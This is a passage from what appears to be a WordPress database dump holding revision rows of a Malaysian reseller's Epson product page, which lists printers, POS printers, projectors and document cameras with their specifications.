alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:13:38','2019-09-25 09:13:38','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3462,1,'2019-09-25 17:14:56','2019-09-25 09:14:56','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:14:56','2019-09-25 09:14:56','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3463,1,'2019-09-25 17:15:35','2019-09-25 09:15:35','<p>As a global technology leader, Epson creates and delivers technology 